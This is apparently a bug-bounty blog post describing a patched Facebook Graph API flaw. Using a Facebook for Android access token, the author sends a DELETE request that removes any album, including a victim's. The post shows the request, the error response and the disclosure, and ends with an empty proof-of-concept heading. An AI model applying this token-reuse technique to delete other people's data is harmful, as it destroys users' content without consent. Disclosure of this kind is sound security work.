Obviously that's very disgusting isn't it? Yup this post is about a vulnerability found by me which
 allows a malicious user to delete any photo album on Facebook. Any photo album owned by an 
user or a page or a group could be deleted.

Graph API is primary way for developers to read and write the users data. All the Facebook apps
 of now are using Graph API. In general Graph API requires an access token to read or write
 users data. Read more about Graph API here. 

According to Facebook developers documentation, photo albums cannot be deleted using the
album node in Graph API.

I tried to delete one of my photo albums using graph explorer access token.

Request :-

DELETE /518171421550249 HTTP/1.1

Host :  graph.facebook.com 

Response :-

{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

Why? Because this application doesn't have the capability to delete photo album. But we
need to note the error message. It tells us that some other application does have the
 capability to make this API call :P 

I decided to try it with Facebook for mobile access token because we can see delete
 option for all photo albums in Facebook mobile application isn't it? Yeah and also it uses
 the same Graph API. so took a album id & Facebook for android access token of mine
and tried it.

Album(518171421550249) got deleted :D so whats the next step? Took victim's album
 id and tried to delete it. I was very curious to see the result. 

OMG :D the album got deleted! So i got the key to delete all of your Facebook photos :P
 lol :D 

Immediately reported this bug to Facebook security team. They were too fast in
 identifying this issue and there was a fix in place in less than 2 hours from the
 acknowledgement of the report. 

Final Proof Of Concept :-

But now Problem is resolved and he got $12500 .by Facebook